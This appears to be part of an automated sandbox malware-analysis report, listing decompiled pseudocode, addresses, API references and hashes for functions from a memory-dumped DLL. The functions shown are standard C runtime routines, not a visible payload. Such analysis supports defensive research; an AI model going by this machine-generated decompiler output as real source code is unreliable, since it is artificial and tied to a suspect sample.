Function 6D4CD5FF, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6D4CD5FF(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x6d5451e4; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E6D4CC7EF(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E6D4D4196(_t25, __eflags,  *0x6d5451e4, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E6D4CD33F(_t25, _t31, 0x6d5476f0);
							E6D4CCBD3(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E6D4CCBD3();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E6D4C62FA(_t20, _t25, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x6d5451e4; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E6D4CC7EF(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E6D4D4196(_t27, __eflags,  *0x6d5451e4, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E6D4CD33F(_t27, _t32, 0x6d5476f0);
									E6D4CCBD3(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E6D4CCBD3();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E6D4D4140(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E6D4D4140(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x6d4cd5ff
0x6d4cd5ff
0x6d4cd5ff
0x6d4cd609
0x6d4cd60b
0x6d4cd610
0x6d4cd613
0x6d4cd621
0x6d4cd628
0x6d4cd62d
0x6d4cd630
0x6d4cd633
0x6d4cd645
0x6d4cd64a
0x6d4cd64c
0x6d4cd657
0x6d4cd65e
0x6d4cd663
0x6d4cd666
0x6d4cd668
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4cd64e
0x6d4cd64e
0x00000000
0x6d4cd64e
0x6d4cd635
0x6d4cd635
0x6d4cd636
0x6d4cd636
0x6d4cd63b
0x6d4cd676
0x6d4cd677
0x6d4cd67d
0x6d4cd682
0x6d4cd685
0x6d4cd686
0x6d4cd687
0x6d4cd68e
0x6d4cd690
0x6d4cd692
0x6d4cd697
0x6d4cd69a
0x6d4cd6a8
0x6d4cd6b4
0x6d4cd6b7
0x6d4cd6ba
0x6d4cd6cc
0x6d4cd6d1
0x6d4cd6d3
0x6d4cd6de
0x6d4cd6e4
0x6d4cd6ec
0x6d4cd6ee
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4cd6d5
0x6d4cd6d5
0x00000000
0x6d4cd6d5
0x6d4cd6bc
0x6d4cd6bc
0x6d4cd6bd
0x6d4cd6bd
0x6d4cd6f0
0x6d4cd6f1
0x6d4cd6f1
0x6d4cd69c
0x6d4cd6a2
0x6d4cd6a6
0x6d4cd6f9
0x6d4cd6fa
0x6d4cd700
0x00000000
0x00000000
0x00000000
0x6d4cd6a6
0x6d4cd707
0x6d4cd707
0x6d4cd615
0x6d4cd61b
0x6d4cd61f
0x6d4cd66a
0x6d4cd66b
0x6d4cd675
0x00000000
0x00000000
0x00000000
0x6d4cd61f

APIs

GetLastError.KERNEL32(?,6D55CE94,6D4C1803,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,43D0C569), ref: 6D4CD603
_free.LIBCMT ref: 6D4CD636
_free.LIBCMT ref: 6D4CD65E
SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,43D0C569), ref: 6D4CD66B
SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,43D0C569), ref: 6D4CD677
_abort.LIBCMT ref: 6D4CD67D

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: ad746db9c886955433ba73dba6d12a632bec779a49193eff18c9a7f57a64219c
Instruction ID: 91a8c59dda25ff67eac54beaac10ca2b47c04f0bfd38dfe71d108b06d9820a6b
Opcode Fuzzy Hash: ad746db9c886955433ba73dba6d12a632bec779a49193eff18c9a7f57a64219c
Instruction Fuzzy Hash: 3EF0A93D6C851166C70267745C49F6A25769FD2775F374119F62CD2285EF24CC0281E7

Uniqueness

Uniqueness Score: -1.00%

Function 6D4875E8, Relevance: 9.0, APIs: 6, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E6D4875E8(intOrPtr _a4) {
				char _v16;
				intOrPtr _v24;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v68;
				char _v76;
				void* _t33;
				void* _t35;
				void* _t36;

				_t36 = _t35 - 0xc;
				E6D4873A9( &_v16, _a4);
				E6D4A3D74( &_v16, 0x6d5414fc);
				asm("int3");
				_push(_t35);
				E6D4873E3( &_v44, _v24);
				E6D4A3D74( &_v44, 0x6d541538);
				asm("int3");
				_push(_t36);
				_t33 = _t36 - 0xc;
				E6D487426( &_v76, _v52);
				E6D4A3D74( &_v76, 0x6d5415ac);
				asm("int3");
				_push(_t33);
				E6D461420( &_v68, _v48);
				E6D4A3D74( &_v68, 0x6d543450);
				asm("int3");
				return  &M6D4EA3FC;
			}

0x6d4875eb
0x6d4875f4
0x6d487602
0x6d487607
0x6d487608
0x6d487614
0x6d487622
0x6d487627
0x6d487628
0x6d487629
0x6d487634
0x6d487642
0x6d487647
0x6d487648
0x6d487654
0x6d487662
0x6d487667
0x6d48766d

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D4875F4

Part of subcall function 6D4873A9: std::exception::exception.LIBCONCRT ref: 6D4873B6

__CxxThrowException@8.LIBVCRUNTIME ref: 6D487602

Part of subcall function 6D4A3D74: RaiseException.KERNEL32(00000000,?,uHm,00000000,?,?,?,?,?,?,?,6D4875E7,00000000,6D5414C0,?), ref: 6D4A3DD4

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D487614

Part of subcall function 6D4873E3: std::exception::exception.LIBCONCRT ref: 6D4873F0

__CxxThrowException@8.LIBVCRUNTIME ref: 6D487622
std::regex_error::regex_error.LIBCPMT ref: 6D487634

Part of subcall function 6D487426: std::exception::exception.LIBCONCRT ref: 6D48743E

__CxxThrowException@8.LIBVCRUNTIME ref: 6D487642

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
String ID:
API String ID: 2570946744-0
Opcode ID: aff9cf780a6fa4cfb1527df65c0bc9b44b08aede3800d48b98edd108c2e1c919
Instruction ID: 01140425eafde6d342faf02eebf472e4aab41b4a677c0082fbf49875db3084ba
Opcode Fuzzy Hash: aff9cf780a6fa4cfb1527df65c0bc9b44b08aede3800d48b98edd108c2e1c919
Instruction Fuzzy Hash: 59F08275C0810CB7CB04FAE4EC49DEDBB7CAA14240F408528AB14A2446EB71AB19CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4853EB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6D4853EB(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t35;
				short _t49;
				intOrPtr _t55;
				signed int _t58;
				intOrPtr _t66;
				void* _t70;
				void* _t78;

				_t61 = __edx;
				E6D4A014E(0x6d4e8264, __ebx, __edi, __esi, 0xa4);
				_t55 = __ecx;
				 *((intOrPtr*)(_t70 - 0x4c)) = __ecx;
				 *((intOrPtr*)(_t70 - 0x44)) = E6D4C1A3F(__ecx, __edx);
				_t35 = E6D4891D8(__ecx, __edx, _t78, _t70 - 0x80);
				_t58 = 0xb;
				memcpy(_t70 - 0x40, _t35, _t58 << 2);
				_t66 =  *((intOrPtr*)(_t70 - 0x44));
				_t79 =  *((char*)(_t70 + 0xc));
				 *((intOrPtr*)(_t55 + 8)) = 0;
				 *((intOrPtr*)(_t55 + 0x10)) = 0;
				 *((intOrPtr*)(_t55 + 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				if( *((char*)(_t70 + 0xc)) == 0) {
					_t13 = _t66 + 8; // 0x0
					 *((intOrPtr*)(_t70 - 0x48)) =  *_t13;
				} else {
					 *((intOrPtr*)(_t70 - 0x48)) = 0x6d4f94dd;
				}
				E6D4891D8(_t55, _t61, _t79, _t70 - 0x80);
				_push(_t70 - 0xac);
				_push(0);
				 *((intOrPtr*)(_t55 + 8)) = E6D485B01(_t61, _t66, 0, _t70, _t79,  *((intOrPtr*)(_t70 - 0x48)));
				_push(_t70 - 0x40);
				 *((intOrPtr*)(_t55 + 0x10)) = E6D4617AF(_t55, _t61, _t66, 0, _t70, _t79, "false", 0);
				_push(_t70 - 0x40);
				 *((intOrPtr*)(_t55 + 0x14)) = E6D4617AF(_t55, _t61, _t66, 0, _t70, _t79, "true", 0);
				if( *((char*)(_t70 + 0xc)) == 0) {
					_t28 = _t66 + 0x30; // 0x0
					 *((short*)(_t55 + 0xc)) =  *((intOrPtr*)( *_t28));
					_t30 = _t66 + 0x34; // 0xc
					_t49 =  *((intOrPtr*)( *_t30));
				} else {
					 *((short*)(_t55 + 0xc)) = E6D46177E(0x2e, 0, _t70 - 0x40);
					_t49 = E6D46177E(0x2c, 0, _t70 - 0x40);
				}
				 *((short*)(_t55 + 0xe)) = _t49;
				return E6D4A009B(_t49, _t55, _t66, 0);
			}

0x6d4853eb
0x6d4853f5
0x6d4853fa
0x6d4853fc
0x6d485404
0x6d48540b
0x6d485413
0x6d485419
0x6d48541b
0x6d485420
0x6d485424
0x6d485427
0x6d48542a
0x6d48542d
0x6d485430
0x6d48543b
0x6d48543e
0x6d485432
0x6d485432
0x6d485432
0x6d485445
0x6d485451
0x6d485452
0x6d48545e
0x6d485464
0x6d485473
0x6d485479
0x6d485488
0x6d48548f
0x6d4854bf
0x6d4854c5
0x6d4854c9
0x6d4854cc
0x6d485491
0x6d4854a0
0x6d4854ab
0x6d4854b0
0x6d4854b3
0x6d4854bc

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6D4853F5
__Getcvt.LIBCPMT ref: 6D48540B
__Getcvt.LIBCPMT ref: 6D485445

Strings

true, xrefs: 6D48547B
false, xrefs: 6D485466

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Getcvt$H_prolog3_catch_
String ID: false$true
API String ID: 1810345438-2658103896
Opcode ID: c123c79331af504d8fa3ff32f3f0db8de236acc716cf7689f23ff015745e0d24
Instruction ID: 5fd1055840b6146768ea62716889889f2e9c0d23049aec95d9badd19c966c162
Opcode Fuzzy Hash: c123c79331af504d8fa3ff32f3f0db8de236acc716cf7689f23ff015745e0d24
Instruction Fuzzy Hash: 81217EB5D05218ABDB01CFA0C880EEE7BB8BF15750F09406AE905AB201E731DD05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C970F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6D4C96A5,?,?,6D4C9645,?,6D542D28,0000000C,6D4C978A), ref: 6D4C972F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D4C9742
FreeLibrary.KERNEL32(00000000,?,?,?,6D4C96A5,?,?,6D4C9645,?,6D542D28,0000000C,6D4C978A), ref: 6D4C9765

Strings

mscoree.dll, xrefs: 6D4C9728
CorExitProcess, xrefs: 6D4C973A

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: bebf8353442babb216cbf69769ea4fd96640f8b52c1aa9b2f157f20ff1feb5c1
Instruction ID: 2b857e0b770488a5c32586f3704ae1972540cae78ca4b647c3661cfd5c28b010
Opcode Fuzzy Hash: bebf8353442babb216cbf69769ea4fd96640f8b52c1aa9b2f157f20ff1feb5c1
Instruction Fuzzy Hash: 82F06D34A02109FBDF01AF91C849FBEBFB9EF85316F114069F905A6251CB318E45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D4E2A, Relevance: 7.7, APIs: 5, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E6D4D4E2A(void* __ebx, int __edx, void* __edi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				int _v44;
				char _v48;
				void* __esi;
				signed int _t59;
				char* _t61;
				int _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t91;
				int _t93;
				char* _t98;
				int _t103;
				char* _t105;
				int _t106;
				int _t107;
				short* _t109;
				int _t110;
				int _t111;
				signed int _t112;

				_t106 = __edx;
				_t59 =  *0x6d54506c; // 0xff2bc58a
				_v8 = _t59 ^ _t112;
				_t61 = _a4;
				_t91 = _a12;
				_t111 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t109 = _a8;
				_v24 = _t109;
				if(_t61 == 0 || _t91 != 0) {
					if(_t109 != 0) {
						E6D4B1F60(_t91,  &_v48, _t106, _a16);
						_t98 = _v28;
						if(_t98 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t111) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t111, _t109, 0xffffffff, _t111, _t111, _t111,  &_v20);
								if(_t64 == 0 || _v20 != _t111) {
									L55:
									_t65 = E6D4C2281();
									_t110 = _t109 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t110 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t109 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t110 = _t111;
								goto L56;
							}
							_t106 = 0xff;
							while(_t68 <= _t106) {
								_t109 =  &(_t109[1]);
								_t111 = _t111 + 1;
								_t68 =  *_t109 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t106 = _v44;
						if( *((intOrPtr*)(_t106 + 0xa8)) != _t111) {
							if( *((intOrPtr*)(_t106 + 4)) != 1) {
								_t110 = WideCharToMultiByte( *(_t106 + 8), _t111, _t109, 0xffffffff, _t98, _t91, _t111,  &_v20);
								if(_t110 == 0) {
									if(_v20 != _t111 || GetLastError() != 0x7a) {
										L45:
										_t71 = E6D4C2281();
										_t111 = _t111 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t91 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t107 = _v44;
											_t103 =  *(_t107 + 4);
											if(_t103 > 5) {
												_t103 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t107 + 8), _t111, _t73, 1,  &_v16, _t103, _t111,  &_v20);
											_t93 = _a12;
											_t106 = _t74;
											if(_t106 == 0 || _v20 != _t111 || _t106 < 0 || _t106 > 5) {
												goto L55;
											}
											if(_t106 + _t110 > _t93) {
												goto L56;
											}
											_t76 = _t111;
											_v32 = _t76;
											if(_t106 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t110 < _t93) {
													continue;
												}
												goto L56;
											}
											_t105 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t112 + _t76 - 0xc));
												 *((char*)(_t105 + _t110)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t110 = _t110 + 1;
												_v32 = _t76;
												if(_t76 < _t106) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t111) {
									goto L45;
								}
								_t28 = _t110 - 1; // -1
								_t111 = _t28;
								goto L51;
							}
							if(_t91 == 0) {
								L21:
								_t111 = WideCharToMultiByte( *(_t106 + 8), _t111, _t109, _t91, _t98, _t91, _t111,  &_v20);
								if(_t111 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t111 - 1] == 0) {
										_t111 = _t111 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t109;
							_v24 = _t91;
							while( *_t83 != _t111) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t111 &&  *_t83 == _t111) {
								_t91 = (_t83 - _t109 >> 1) + 1;
							}
							goto L21;
						}
						if(_t91 == 0) {
							goto L51;
						}
						_t106 = 0xff;
						while( *_t109 <= _t106) {
							_t98[_t111] =  *_t109;
							_t85 =  *_t109;
							_t109 =  &(_t109[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t111 = _t111 + 1;
							if(_t111 < _t91) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E6D4C2281())) = 0x16;
					E6D4C215B();
					goto L59;
				} else {
					L59:
					return E6D49F8A5(_v8 ^ _t112, _t106, _t111);
				}
			}

0x6d4d4e2a
0x6d4d4e32
0x6d4d4e39
0x6d4d4e3c
0x6d4d4e40
0x6d4d4e44
0x6d4d4e46
0x6d4d4e49
0x6d4d4e4d
0x6d4d4e50
0x6d4d4e55
0x6d4d4e64
0x6d4d4e84
0x6d4d4e89
0x6d4d4e8e
0x6d4d502b
0x6d4d5034
0x6d4d5066
0x6d4d506e
0x6d4d507a
0x6d4d507a
0x6d4d507f
0x6d4d5082
0x00000000
0x6d4d5075
0x6d4d5075
0x6d4d5075
0x6d4d5088
0x6d4d508c
0x6d4d5091
0x6d4d5091
0x00000000
0x6d4d5098
0x6d4d506e
0x6d4d5036
0x6d4d503c
0x6d4d5054
0x6d4d5054
0x00000000
0x6d4d5054
0x6d4d503e
0x6d4d5043
0x6d4d5048
0x6d4d504b
0x6d4d504c
0x6d4d5052
0x00000000
0x00000000
0x00000000
0x6d4d5052
0x00000000
0x6d4d5043
0x6d4d4e94
0x6d4d4e9d
0x6d4d4ed7
0x6d4d4f50
0x6d4d4f54
0x6d4d4f6a
0x6d4d501b
0x6d4d501b
0x6d4d5020
0x6d4d5023
0x00000000
0x6d4d4f7f
0x6d4d4f81
0x00000000
0x00000000
0x6d4d4f87
0x6d4d4f8a
0x6d4d4f8a
0x6d4d4f8d
0x6d4d4f93
0x6d4d4f97
0x6d4d4f97
0x6d4d4fa9
0x6d4d4faf
0x6d4d4fb2
0x6d4d4fb6
0x00000000
0x00000000
0x6d4d4fdb
0x00000000
0x00000000
0x6d4d4fe1
0x6d4d4fe3
0x6d4d4fe8
0x6d4d5008
0x6d4d500b
0x6d4d500e
0x6d4d5013
0x00000000
0x00000000
0x00000000
0x6d4d5019
0x6d4d4fea
0x6d4d4fed
0x6d4d4fed
0x6d4d4ff1
0x6d4d4ff6
0x00000000
0x00000000
0x6d4d4fff
0x6d4d5000
0x6d4d5001
0x6d4d5006
0x00000000
0x00000000
0x00000000
0x6d4d5006
0x00000000
0x6d4d4fed
0x00000000
0x6d4d4f8a
0x6d4d4f6a
0x6d4d4f59
0x00000000
0x00000000
0x6d4d4f5f
0x6d4d4f5f
0x00000000
0x6d4d4f5f
0x6d4d4edb
0x6d4d4f01
0x6d4d4f14
0x6d4d4f18
0x00000000
0x6d4d4f28
0x6d4d4f30
0x6d4d4f36
0x6d4d4f36
0x00000000
0x6d4d4f30
0x6d4d4f18
0x6d4d4edd
0x6d4d4edf
0x6d4d4ee2
0x6d4d4ee7
0x6d4d4eea
0x6d4d4eea
0x6d4d4eee
0x00000000
0x00000000
0x00000000
0x6d4d4eee
0x6d4d4ef3
0x6d4d4f00
0x6d4d4f00
0x00000000
0x6d4d4ef3
0x6d4d4ea1
0x00000000
0x00000000
0x6d4d4ea7
0x6d4d4eac
0x6d4d4eb7
0x6d4d4eba
0x6d4d4ebd
0x6d4d4ec3
0x00000000
0x00000000
0x6d4d4ec9
0x6d4d4ecc
0x00000000
0x00000000
0x00000000
0x6d4d4ece
0x00000000
0x6d4d4eac
0x6d4d4e6b
0x6d4d4e71
0x00000000
0x6d4d4e5b
0x6d4d509a
0x6d4d50aa
0x6d4d50aa

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54d774c7bdf487188b6d7ae0938af91626fc4fd70efa032fcef302cdc068989e
Instruction ID: 7ed434a9337e0542b087085c0ba57c337520ed1add91e1c0926d2ac55d8672c1
Opcode Fuzzy Hash: 54d774c7bdf487188b6d7ae0938af91626fc4fd70efa032fcef302cdc068989e
Instruction Fuzzy Hash: 0771AD319042179BDB52DF98C8A4EBFBB75EF47350F244229E924A7284CB718D46CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CA737, Relevance: 7.6, APIs: 5, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6D4CA737(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x6d54506c; // 0xff2bc58a
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E6D4C1F1D( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E6D49F8FA(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E6D49F8FA(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E6D49F8FA(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E6D4DAC0E(_t56);
						_t40 = E6D4CCBD3(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E6D4DAC0E(_t56);
						E6D4CCBD3(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x6d54506c;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x6d4ca737
0x6d4ca741
0x6d4ca745
0x6d4ca747
0x6d4ca74b
0x6d4ca755
0x6d4ca766
0x6d4ca76b
0x6d4ca76d
0x6d4ca76f
0x6d4ca771
0x6d4ca773
0x6d4ca777
0x6d4ca831
0x6d4ca83f
0x6d4ca841
0x6d4ca846
0x6d4ca84d
0x6d4ca84f
0x6d4ca85d
0x6d4ca86c
0x6d4ca86f
0x6d4ca871
0x00000000
0x6d4ca872
0x6d4ca77f
0x6d4ca784
0x6d4ca789
0x6d4ca78b
0x6d4ca78b
0x6d4ca78d
0x6d4ca792
0x6d4ca796
0x6d4ca796
0x6d4ca799
0x6d4ca7b8
0x6d4ca7b8
0x6d4ca7ba
0x6d4ca7bd
0x6d4ca7c6
0x6d4ca7c9
0x6d4ca7ce
0x6d4ca7d1
0x6d4ca7d6
0x00000000
0x00000000
0x6d4ca7d8
0x00000000
0x6d4ca79b
0x6d4ca79b
0x6d4ca79d
0x6d4ca7a6
0x6d4ca7a9
0x6d4ca7ae
0x6d4ca7b1
0x6d4ca7b6
0x6d4ca7e0
0x6d4ca7e3
0x6d4ca7e5
0x6d4ca7e8
0x6d4ca7f0
0x6d4ca7f6
0x6d4ca7fd
0x6d4ca7ff
0x6d4ca807
0x6d4ca816
0x6d4ca81a
0x6d4ca81c
0x6d4ca81f
0x00000000
0x00000000
0x6d4ca821
0x6d4ca824
0x6d4ca826
0x6d4ca826
0x6d4ca827
0x6d4ca829
0x6d4ca82c
0x00000000
0x6d4ca826
0x00000000
0x6d4ca7b6
0x6d4ca799
0x00000000

APIs

_free.LIBCMT ref: 6D4CA7A9
_free.LIBCMT ref: 6D4CA7C9

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

